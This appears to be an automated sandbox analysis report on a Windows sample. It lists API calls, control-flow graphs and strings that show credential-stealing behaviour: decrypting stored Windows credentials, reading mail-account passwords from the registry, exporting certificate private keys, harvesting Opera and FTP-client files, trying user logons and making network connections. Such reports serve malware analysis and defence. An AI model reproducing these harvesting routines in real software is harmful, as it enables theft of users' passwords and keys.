13489 404192 41 API calls 13488->13489 13490 408e50 13489->13490 13491 4018a0 LocalFree 13490->13491 13491->13484 13493 406752 13492->13493 13500 4064f3 13492->13500 13493->11663 13494 4064fa RegEnumKeyExA 13495 406523 RegCloseKey 13494->13495 13494->13500 13495->13493 13497 401c3f 5 API calls 13497->13500 13498 401c93 6 API calls 13498->13500 13499 401bb8 6 API calls 13499->13500 13500->13494 13500->13497 13500->13498 13500->13499 13501 40421d 2 API calls 13500->13501 13502 4018a0 LocalFree 13500->13502 13503 4015b3 lstrlenA 13500->13503 13501->13500 13502->13500 13503->13500 13505 4048d2 13504->13505 13511 40477f 13504->13511 13505->11674 13506 404786 RegEnumKeyExA 13507 4047af RegCloseKey 13506->13507 13506->13511 13507->13505 13509 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 13509->13511 13510 401bb8 6 API calls 13510->13511 13511->13506 13511->13509 13511->13510 13512 40475c 11 API calls 13511->13512 13513 4015b3 lstrlenA 13511->13513 13514 4018a0 LocalFree 13511->13514 13512->13511 13513->13511 13514->13511 13516 404758 13515->13516 13521 404671 13515->13521 13516->11680 13517 404678 RegEnumValueA 13518 4046a6 RegCloseKey 13517->13518 13517->13521 13518->13516 13520 4046c2 StrStrIA 13520->13521 13521->13517 13521->13520 13522 401bb8 6 API calls 13521->13522 13523 4018a0 LocalFree 13521->13523 13522->13521 13523->13521 13525 40a77e 13524->13525 13527 40a6d4 13524->13527 13531 40a798 13525->13531 13526 40a736 StrStrIW 13526->13527 13527->13525 13527->13526 13540 40a54c lstrlenW 13527->13540 13529 40a766 CoTaskMemFree 13529->13527 13530 40a774 CoTaskMemFree 13529->13530 13530->13527 13532 40a7a8 13531->13532 13533 40a8ce 13532->13533 13534 40a7ed CredEnumerateA 13532->13534 13533->11689 13534->13533 13537 40a818 13534->13537 13535 40a8c5 CredFree 13535->13533 13536 40a834 lstrlenW CryptUnprotectData 13536->13537 13537->13533 13537->13535 13537->13536 13538 40a8a7 LocalFree 13537->13538 13566 40a35c 13537->13566 13538->13537 13541 40a55f 13540->13541 13546 40a564 13540->13546 13541->13529 13542 40a5c2 wsprintfA 13545 401c93 6 API calls 13542->13545 13543 40a595 wsprintfA 13544 401c93 6 API calls 13543->13544 13544->13546 13547 40a5e9 13545->13547 13546->13542 13546->13543 13548 401bb8 6 API calls 13547->13548 13549 40a603 13548->13549 13550 40a6a2 13549->13550 13552 40a618 lstrlenW 13549->13552 13553 40a69a 13549->13553 13551 4018a0 LocalFree 13550->13551 13555 40a6aa 13551->13555 13552->13553 13556 40a64a CryptUnprotectData 13552->13556 13554 4018a0 LocalFree 13553->13554 13554->13550 13555->13529 13556->13553 13557 40a668 13556->13557 13557->13553 13560 40a323 13557->13560 13559 40a692 LocalFree 13559->13553 13564 401551 13560->13564 13562 40a331 lstrlenW 13563 40a34a 13562->13563 13563->13559 13565 401562 13564->13565 13565->13562 13567 401551 13566->13567 13568 40a36a lstrlenA 13567->13568 13569 40a37f 13568->13569 13569->13538 13571 401cf8 7 API calls 13570->13571 13572 40d79b 13571->13572 13573 40d7c8 13572->13573 13574 401c93 6 API calls 13572->13574 13573->11749 13575 40d7aa 13574->13575 13576 403fe7 41 API calls 13575->13576 13577 40d7c3 13576->13577 13578 4018a0 LocalFree 13577->13578 13578->13573 13580 40dcc2 13579->13580 13585 40daad 13579->13585 13580->11783 13581 40dab4 RegEnumKeyExA 13582 40dadd RegCloseKey 13581->13582 13581->13585 13582->13580 13584 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 13584->13585 13585->13581 13585->13584 13586 401bb8 6 API calls 13585->13586 13587 40da8d 11 API calls 13585->13587 13588 4015b3 lstrlenA 13585->13588 13589 4018a0 LocalFree 13585->13589 13586->13585 13587->13585 13588->13585 13589->13585 13591 40cb91 13590->13591 13592 40cb15 13590->13592 13591->11793 13592->13591 13593 40cb27 CredEnumerateA 13592->13593 13593->13591 13594 40cb4e 13593->13594 13594->13591 13595 40cb88 CredFree 13594->13595 13597 40ca54 13594->13597 13595->13591 13598 40ca67 13597->13598 13599 4015b3 lstrlenA 13598->13599 13600 40ca72 13599->13600 13601 4015b3 lstrlenA 13600->13601 13602 40ca7d 13601->13602 13603 40ca8b StrStrIA 13602->13603 13604 40ca9c lstrlenA StrStrIA 13603->13604 13609 40cae8 13603->13609 13605 40caba 13604->13605 13610 403607 inet_addr 13605->13610 13607 40cac8 13608 4015b3 lstrlenA 13607->13608 13607->13609 13608->13609 13609->13594 13611 403617 gethostbyname 13610->13611 13612 403623 13610->13612 13611->13612 13612->13607 13614 401bb8 6 API calls 13613->13614 13615 405ce6 13614->13615 13616 405cff 13615->13616 13617 404192 41 API calls 13615->13617 13618 401bb8 6 API calls 13616->13618 13619 405cfa 13617->13619 13620 405d15 13618->13620 13622 4018a0 LocalFree 13619->13622 13621 405d2e 13620->13621 13623 404192 41 API calls 13620->13623 13624 4041dd 46 API calls 13621->13624 13622->13616 13625 405d29 13623->13625 13626 405d41 13624->13626 13627 4018a0 LocalFree 13625->13627 13626->11803 13627->13621 13629 4073bf 13628->13629 13635 407201 13628->13635 13629->11809 13630 407208 RegEnumKeyExA 13631 407231 RegCloseKey 13630->13631 13630->13635 13631->13629 13633 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 13633->13635 13634 401bb8 6 API calls 13634->13635 13635->13630 13635->13633 13635->13634 13636 4071e1 11 API calls 13635->13636 13637 4015b3 lstrlenA 13635->13637 13638 4018a0 LocalFree 13635->13638 13636->13635 13637->13635 13638->13635 13640 40d5bd 13639->13640 13645 40d40e 13639->13645 13640->11822 13641 40d415 RegEnumKeyExA 13642 40d43e RegCloseKey 13641->13642 13641->13645 13642->13640 13644 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 13644->13645 13645->13641 13645->13644 13646 401bb8 6 API calls 13645->13646 13647 40d3eb 11 API calls 13645->13647 13648 4018a0 LocalFree 13645->13648 13649 4015b3 lstrlenA 13645->13649 13646->13645 13647->13645 13648->13645 13649->13645 13651 406d79 13650->13651 13656 406bac 13650->13656 13651->11827 13652 406bb3 RegEnumKeyExA 13653 406bdc RegCloseKey 13652->13653 13652->13656 13653->13651 13655 401c3f LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 13655->13656 13656->13652 13656->13655 13657 401bb8 6 API calls 13656->13657 13658 4018a0 LocalFree 13656->13658 13659 40421d 2 API calls 13656->13659 13660 4015b3 lstrlenA 13656->13660 13657->13656 13658->13656 13659->13656 13660->13656 13662 401d7d 2 API calls 13661->13662 13663 406e04 13662->13663 13664 406e08 13663->13664 13665 406e0d 13663->13665 13664->11850 13666 401e44 7 API calls 13665->13666 13667 406e19 13666->13667 13668 406eb9 13667->13668 13678 4018b7 LocalAlloc 13667->13678 13668->11850 13672 406e29 13678->13672 13687 4102e0 SetUnhandledExceptionFilter 13688 4102ed 13687->13688 13697 40f83b 13688->13697 13690 4102f2 13691 410314 13690->13691 13692 41030e RevertToSelf 13690->13692 13702 40ff3a 13691->13702 13692->13691 13694 410323 13708 410042 13694->13708 13696 410328 13698 40f84c 13697->13698 13699 40f84d 13697->13699 13698->13690 13700 40f864 GetTickCount 13699->13700 13701 40f884 13699->13701 13700->13699 13701->13690 13703 40ff4b 13702->13703 13706 40ff4c 13702->13706 13703->13694 13704 40ff5f 13704->13694 13705 4028f1 LocalFree LocalAlloc WideCharToMultiByte WideCharToMultiByte 13705->13706 13706->13704 13706->13705 13724 4018b7 LocalAlloc 13706->13724 13709 410054 13708->13709 13718 410055 13708->13718 13709->13696 13710 410068 13710->13696 13711 410087 lstrcmpiA 13712 41009e LogonUserA 13711->13712 13711->13718 13712->13718 13713 41014d LoadUserProfileA 13713->13718 13714 402864 3 API calls 13715 4100cc lstrlenA LCMapStringA 13714->13715 13717 4100f2 LogonUserA 13715->13717 13715->13718 13716 4101b2 ImpersonateLoggedOnUser 13716->13718 13717->13718 13718->13710 13718->13711 13718->13712 13718->13713 13718->13714 13718->13716 13719 4018a0 LocalFree 13718->13719 13720 4101e3 UnloadUserProfile 13718->13720 13721 4101ee CloseHandle 13718->13721 13722 41012a LogonUserA 13718->13722 13723 4101cd RevertToSelf 13718->13723 13719->13718 13720->13721 13721->13718 13722->13713 13722->13718 13723->13718 13724->13706 14323 40ba61 14324 40ba78 14323->14324 14325 40ba6f 14323->14325 14325->14324 14326 40baf3 CryptUnprotectData 14325->14326 14326->14324 14327 40bb26 14326->14327 14327->14324 14328 40bb4a LocalFree 14327->14328 14328->14324 14329 40bb62 14328->14329 14329->14324 14338 4018b7 LocalAlloc 14329->14338 14331 40bb7e 14332 40bb8f lstrlenA StrCmpNIA 14331->14332 14333 40bbc3 14332->14333 14334 40bbab lstrlenA StrCmpNIA 14332->14334 14335 40bbc7 lstrlenA StrCmpNIA 14333->14335 14337 40bbdf 14333->14337 14334->14333 14335->14337 14336 4018a0 LocalFree 14336->14324 14337->14336 14338->14331 13731 40f9f8 13732 40fa00 13731->13732 13744 40fa14 13732->13744 13745 4017bd GetHGlobalFromStream 13732->13745 13734 40fa2c 13734->13744 13759 40165d GetHGlobalFromStream 13734->13759 13736 40fa3a 13736->13744 13765 4016c3 GetHGlobalFromStream 13736->13765 13738 40fa48 13738->13744 13773 401a0f GetHGlobalFromStream 13738->13773 13740 40fa5b 13741 40165d 3 API calls 13740->13741 13740->13744 13742 40fa69 13741->13742 13743 4016c3 3 API calls 13742->13743 13742->13744 13743->13744 13746 401891 13745->13746 13747 4017da 13745->13747 13746->13734 13748 4017e2 GlobalLock 13747->13748 13748->13746 13749 4017f5 13748->13749 13783 4018b7 LocalAlloc 13749->13783 13751 40180e 13784 4018b7 LocalAlloc 13751->13784 13753 401827 13754 40183d GlobalUnlock 13753->13754 13755 401853 13754->13755 13756 4018a0 LocalFree 13755->13756 13757 401889 13756->13757 13758 4018a0 LocalFree 13757->13758 13758->13746 13760 40167a 13759->13760 13763 4016a7 13759->13763 13761 401682 GlobalLock 13760->13761 13762 401691 13761->13762 13761->13763 13764 40169c GlobalUnlock 13762->13764 13763->13736 13764->13763 13766 40172d 13765->13766 13767 4016e0 13765->13767 13766->13738 13768 4016f1 GlobalLock 13767->13768 13769 40171d 13767->13769 13770 401701 13768->13770 13772 401733 13768->13772 13769->13738 13771 40170c GlobalUnlock 13770->13771 13771->13772 13772->13738 13774 401ac5 13773->13774 13775 401a2f 13773->13775 13774->13740 13776 401a37 GlobalLock 13775->13776 13776->13774 13777 401a46 13776->13777 13785 4018b7 LocalAlloc 13777->13785 13779 401a51 13780 401a62 GlobalUnlock lstrlenA 13779->13780 13781 401a82 13780->13781 13782 4018a0 LocalFree 13781->13782 13782->13774 13783->13751 13784->13753 13785->13779 13800 40fafc 13809 403e3c WSAStartup 13800->13809 13802 40fbc7 13803 40fbb3 13803->13802 13804 402524 19 API calls 13803->13804 13804->13802 13807 40fb01 13807->13802 13807->13803 13808 40fb92 Sleep 13807->13808 13810 403dd8 13807->13810 13819 40f8ad 13807->13819 13808->13807 13809->13807 13811 403e2d 13810->13811 13812 403de7 13810->13812 13811->13807 13812->13811 13813 403ded GetHGlobalFromStream 13812->13813 13813->13811 13814 403dfd 13813->13814 13815 403e05 GlobalLock 13814->13815 13815->13811 13816 403e14 13815->13816 13832 403c26 13816->13832 13820 40f8be 13819->13820 13821 40f8bf GetHGlobalFromStream 13819->13821 13820->13807 13822 40f8d9 13821->13822 13823 40f90e 13821->13823 13919 4018b7 LocalAlloc 13822->13919 13824 40f93a 13823->13824 13825 40f91c StrStrIA 13823->13825 13824->13807 13827 40f92d 13825->13827 13829 4018a0 LocalFree 13827->13829 13828 40f8eb GlobalLock 13828->13823 13830 40f8fa 13828->13830 13829->13824 13831 40f906 GlobalUnlock 13830->13831 13831->13823 13864 4018b7 LocalAlloc 13832->13864 13834 403c41 13865 4018b7 LocalAlloc 13834->13865 13836 403c4e 13866 4018b7 LocalAlloc 13836->13866 13838 403c5b InternetCrackUrlA 13839 403ca2 13838->13839 13840 403ca8 13838->13840 13839->13840 13841 403cad InternetCreateUrlA 13839->13841 13843 4018a0 LocalFree 13840->13843 13841->13840 13842 403cd2 InternetCrackUrlA 13841->13842 13842->13840 13844 403d13 13842->13844 13845 403db2 13843->13845 13844->13840 13846 403d1e wsprintfA 13844->13846 13847 4018a0 LocalFree 13845->13847 13867 403641 socket 13846->13867 13849 403dba 13847->13849 13851 4018a0 LocalFree 13849->13851 13852 403dc2 13851->13852 13854 403dd0 GlobalUnlock 13852->13854 13855 4018a0 LocalFree 13852->13855 13854->13811 13855->13854 13856 403d57 lstrlenA 13879 4036c5 13856->13879 13864->13834 13865->13836 13866->13838 13868 40365a 13867->13868 13872 40365c 13867->13872 13868->13840 13878 403bf8 setsockopt 13868->13878 13869 40367e 13870 4036a2 connect 13869->13870 13870->13868 13874 4036b6 closesocket 13870->13874 13871 403693 13873 403607 2 API calls 13871->13873 13872->13869 13872->13871 13875 40368f 13872->13875 13876 40369b 13873->13876 13874->13868 13875->13874 13876->13870 13878->13856 13919->13828 14024 40100f CreateStreamOnHGlobal 14545 40b712 14546 40b855 14545->14546 14547 4018a0 LocalFree 14546->14547 14548 40b85d 14547->14548 13725 401216 CreateFileA 13726 401231 13725->13726 13727 401235 ReadFile 13725->13727 13728 401261 13727->13728 13729 401253 CloseHandle 13727->13729 13728->13727 13730 401279 CloseHandle 13728->13730 13786 40f999 13793 401770 GetHGlobalFromStream 13786->13793 13788 40f9a4 13789 40263e 18 API calls 13788->13789 13790 40f9b9 13789->13790 13791 40f9df 13790->13791 13792 4018a0 LocalFree 13790->13792 13792->13791 13794 401786 13793->13794 13796 4017b1 13793->13796 13795 40178e GlobalLock 13794->13795 13795->13796 13797 40179d 13795->13797 13796->13788 13798 4022de 2 API calls 13797->13798 13799 4017a9 GlobalUnlock 13798->13799 13799->13796 14025 402a1f 14026 402a29 14025->14026 14028 402a41 14026->14028 14029 4027af 14026->14029 14030 4027d1 14029->14030 14031 4027bf 14029->14031 14030->14026 14031->14030 14032 4027d8 LookupPrivilegeValueA 14031->14032 14033 4027f4 GetCurrentProcess OpenProcessToken 14032->14033 14038 40284e 14032->14038 14036 402835 AdjustTokenPrivileges 14033->14036 14037 40280c 14033->14037 14034 402855 CloseHandle 14035 40285d 14034->14035 14035->14026 14036->14038 14037->14036 14038->14034 14038->14035 13920 41022f OleInitialize 13938 402377 13920->13938 13923 40f83b GetTickCount 13924 41023e 13923->13924 13955 402a46 13924->13955 13926 410248 13927 41024c 13926->13927 13928 41025f 13926->13928 14002 402b2a 13927->14002 13973 4018b7 LocalAlloc 13928->13973 13931 410251 13931->13928 13932 410269 GetUserNameA 13933 410288 13932->13933 13934 410293 13932->13934 13939 40231d 2 API calls 13938->13939 13940 402386 13939->13940 13941 40231d 2 API calls 13940->13941 13942 402395 13941->13942 13943 40231d 2 API calls 13942->13943 13944 4023a4 13943->13944 13945 40231d 2 API calls 13944->13945 13946 4023b3 13945->13946 13947 40231d 2 API calls 13946->13947 13948 4023c2 13947->13948 13949 40231d 2 API calls 13948->13949 13950 4023d1 13949->13950 13951 40231d 2 API calls 13950->13951 13952 4023e0 13951->13952 13953 40231d 2 API calls 13952->13953 13954 4023ef 13953->13954 13954->13923 13956 402a57 13955->13956 13957 402a58 13955->13957 13956->13926 13958 402a74 13957->13958 13959 402a79 GetCurrentProcess OpenProcessToken 13957->13959 13958->13926 13960 402b25 13959->13960 13961 402a95 GetTokenInformation 13959->13961 13960->13926 13962 402ab3 GetLastError 13961->13962 13963 402b1d CloseHandle 13961->13963 13962->13963 13964 402abd 13962->13964 13963->13960 13964->13963 14021 4018b7 LocalAlloc 13964->14021 13973->13932 14003 402b3e 14002->14003 14004 402b3f 14002->14004 14003->13931 14005 402b64 14004->14005 14006 402b69 WTSGetActiveConsoleSessionId CreateToolhelp32Snapshot 14004->14006 14005->13931 15644 40c3b2 15645 40c3c1 15644->15645 15646 40c3c5 MultiByteToWideChar 15644->15646 15656 4018b7 LocalAlloc 15646->15656 15648 40c3e2 MultiByteToWideChar StgOpenStorage 15651 40c416 15648->15651 15652 40c48b 15648->15652 15649 4018a0 LocalFree 15650 40c4a6 15649->15650 15651->15652 15657 4018b7 LocalAlloc 15651->15657 15652->15649 15654 40c44b 15655 4018a0 LocalFree 15654->15655 15655->15652 15656->15648 15657->15654

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E9E1
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EA15
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040ECD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                        • API String ID: 1332880857-2111798378
                                        • Opcode ID: e80406472bb677dfadbd1bfb2f5a7eca4a6c273fc6832594016211cb0775a8e6
                                        • Instruction ID: 39ebad9792fab98b84e61b2ac53ddf023059776370fc8ac86ac537817e1fca94
                                        • Opcode Fuzzy Hash: e80406472bb677dfadbd1bfb2f5a7eca4a6c273fc6832594016211cb0775a8e6
                                        • Instruction Fuzzy Hash: BC71833190011CBADF226F51CC42BDDBAB6BF04704F5485FAB588741B1DB7A5BA1AF88

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 170 40d1e9-40d207 call 4015d8 173 40d3da-40d3e8 call 40161e 170->173 174 40d20d-40d214 170->174 174->173 176 40d21a-40d221 174->176 176->173 178 40d227-40d22e 176->178 178->173 179 40d234-40d23b 178->179 179->173 180 40d241-40d248 179->180 180->173 181 40d24e-40d255 180->181 181->173 182 40d25b-40d262 181->182 182->173 183 40d268-40d27c CertOpenSystemStoreA 182->183 183->173 184 40d282 183->184 185 40d284-40d292 CertEnumCertificatesInStore 184->185 186 40d294-40d3d4 CertCloseStore 185->186 187 40d299-40d2a7 185->187 186->173 189 40d3ca 187->189 190 40d2ad 187->190 189->185 191 40d3c0-40d3c4 190->191 191->189 192 40d2b2-40d2c0 lstrcmpA 191->192 193 40d2c6-40d2ca 192->193 194 40d3ba-40d3bd 192->194 193->194 195 40d2d0-40d2f8 call 4018b7 call 4018ee lstrcmpA 193->195 194->191 200 40d3b2-40d3b5 call 4018a0 195->200 201 40d2fe-40d315 CryptAcquireCertificatePrivateKey 195->201 200->194 201->200 203 40d31b-40d32d CryptGetUserKey 201->203 204 40d3a7-40d3ac CryptReleaseContext 203->204 205 40d32f-40d346 CryptExportKey 203->205 204->200 206 40d348-40d36b call 4018b7 CryptExportKey 205->206 207 40d39e-40d3a1 CryptDestroyKey 205->207 210 40d396-40d399 call 4018a0 206->210 211 40d36d-40d391 call 401551 call 401587 * 2 206->211 207->204 210->207 211->210
                                        APIs
                                        • CertOpenSystemStoreA.CRYPT32(00000000,004168B0), ref: 0040D26F
                                        • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D288
                                        • lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D2B9
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        • lstrcmpA.KERNEL32(?,004168BD,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D2F1
                                        • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D30D
                                        • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D325
                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D33E
                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D363
                                        • CryptDestroyKey.ADVAPI32(?), ref: 0040D3A1
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D3AC
                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D3D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                                        • String ID: 2.5.29.37
                                        • API String ID: 2649496969-3842544949
                                        • Opcode ID: 0792c9f789115089a0e6fd09dc6711bed28ab025e4bcdce8770f8b6267e31e7c
                                        • Instruction ID: da31761f07a1f9bbf3cf79f080f8cacd2302d4bfd3def7505134cbf2f45f95af
                                        • Opcode Fuzzy Hash: 0792c9f789115089a0e6fd09dc6711bed28ab025e4bcdce8770f8b6267e31e7c
                                        • Instruction Fuzzy Hash: DE514531900209EBEF21ABD0DC09BEEBA75BB44310F10813AF901B11F0D7B9AA94DB4D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 218 404cb4-404ccc 219 404cd3 218->219 220 404cce-404cd1 218->220 222 404e31-404e3d call 4018a0 219->222 220->219 221 404cd8-404ce2 call 4023f0 220->221 227 404cf3-404cfb call 401c3f 221->227 228 404ce4-404cf1 call 401c3f 221->228 232 404d00-404d30 call 4018ce FindFirstFileA 227->232 228->232 232->222 235 404d36-404d42 232->235 236 404d44-404d54 lstrcmpiA 235->236 237 404da9-404dc4 StrStrIA 235->237 238 404d56 236->238 239 404d5b-404d71 lstrcmpiA 236->239 240 404dc6-404de5 call 401c3f call 401c93 237->240 241 404e0c-404e20 FindNextFileA 237->241 238->241 242 404d73 239->242 243 404d78-404da7 call 401c3f call 401c93 call 404cb4 call 4018a0 239->243 252 404df4 240->252 253 404de7-404df2 StrStrIA 240->253 241->235 244 404e26-404e2c FindClose 241->244 242->241 243->241 244->222 255 404df9-404dfc 252->255 253->255 257 404e07 call 4018a0 255->257 258 404dfe-404e02 call 404c9d 255->258 257->241 258->257
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00404D24
                                        • lstrcmpiA.KERNEL32(00414FF5,?), ref: 00404D4D
                                        • lstrcmpiA.KERNEL32(00414FF7,?), ref: 00404D6A
                                        • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 00404E19
                                        • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00404E2C
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                          • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                          • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                        • String ID: *.*$.ini$Sites\$\*.*
                                        • API String ID: 3040542784-999409347
                                        • Opcode ID: 0aae2518a55fb08389f6f3a29f2d076f42047f7be90bd65fcc480f2afca4d405
                                        • Instruction ID: 1671739f4b5778c115ec03523a64e3ba0249c514f6e7c98cb4b23fe6f9a4befd
                                        • Opcode Fuzzy Hash: 0aae2518a55fb08389f6f3a29f2d076f42047f7be90bd65fcc480f2afca4d405
                                        • Instruction Fuzzy Hash: 5E3188B1904209AAEF21BF61CC41BEE7769AF80304F1045B7B518B51E1DB7C8FD19EA9

                                        Control-flow Graph

                                        APIs
                                        • GetVersionExA.KERNEL32(0000009C), ref: 00404487
                                        • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 0040450C
                                        • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404535
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004045EA
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404609
                                        • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404619
                                        • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404627
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                                        • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                                        • API String ID: 1787888500-92997708
                                        • Opcode ID: ad4126b2f356a7b41a78327c2c8fbf31f5c3bc83834b15e605a7b3f2a50623dc
                                        • Instruction ID: 0b574c2c967b818523614ca4da9863b103fd095a21c960e0ef507add7f9a0003
                                        • Opcode Fuzzy Hash: ad4126b2f356a7b41a78327c2c8fbf31f5c3bc83834b15e605a7b3f2a50623dc
                                        • Instruction Fuzzy Hash: D5516471A00218BEEF217B61CC42F9D7A75AF85308F1080BAB749790E1C7B94ED19B59
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00408974
                                        • lstrcmpiA.KERNEL32(00414FF5,?), ref: 004089A7
                                        • lstrcmpiA.KERNEL32(00414FF7,?), ref: 004089C1
                                        • StrStrIA.SHLWAPI(?,opera,00000000,00414FF7,?,00414FF5,?,00000000,?), ref: 00408A06
                                        • FindNextFileA.KERNEL32(?,?,00000000,?), ref: 00408A34
                                        • FindClose.KERNEL32(?,?,?,00000000,?), ref: 00408A47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Filelstrcmpi$CloseFirstNext
                                        • String ID: \*.*$opera$wand.dat
                                        • API String ID: 3663067366-3278183560
                                        • Opcode ID: cc8c2ae1ec805632a3dc2e560b6fd5fbc516fb0a31a8cbc763ae18f0584e6b5d
                                        • Instruction ID: 5f5eba21616bee276de1379284b9277ec38cfd227afb08a9fc9774cebfde712f
                                        • Opcode Fuzzy Hash: cc8c2ae1ec805632a3dc2e560b6fd5fbc516fb0a31a8cbc763ae18f0584e6b5d
                                        • Instruction Fuzzy Hash: 45310F71A1021DAAEF21AB61CD42BE977B5AF44304F0040BBB54CB51E1DB789FC19F59
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00404057
                                        • lstrcmpiA.KERNEL32(00414FF5,?), ref: 00404084
                                        • lstrcmpiA.KERNEL32(00414FF7,?), ref: 004040A1
                                        • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 0040416B
                                        • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 0040417E
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                          • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                          • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                        • String ID: *.*$\*.*
                                        • API String ID: 3040542784-1692270452
                                        • Opcode ID: 788852833f91880b989663a86c155a2a9d0f28116d26d3354b2969baaf3090b1
                                        • Instruction ID: 96ffe1822308c344882b937506825fc8f8ea41ddccb83b55b632ba5873b27b1a
                                        • Opcode Fuzzy Hash: 788852833f91880b989663a86c155a2a9d0f28116d26d3354b2969baaf3090b1
                                        • Instruction Fuzzy Hash: F74174B190021DAAEF21BF21CC45AEE3B69AF44344F1044B7BA08B51F1DB7D8AD19B59
                                        APIs
                                        • lstrlenW.KERNEL32(?), ref: 0040A556
                                        • wsprintfA.USER32 ref: 0040A5D5
                                        • lstrlenW.KERNEL32(?,?), ref: 0040A61B
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A65E
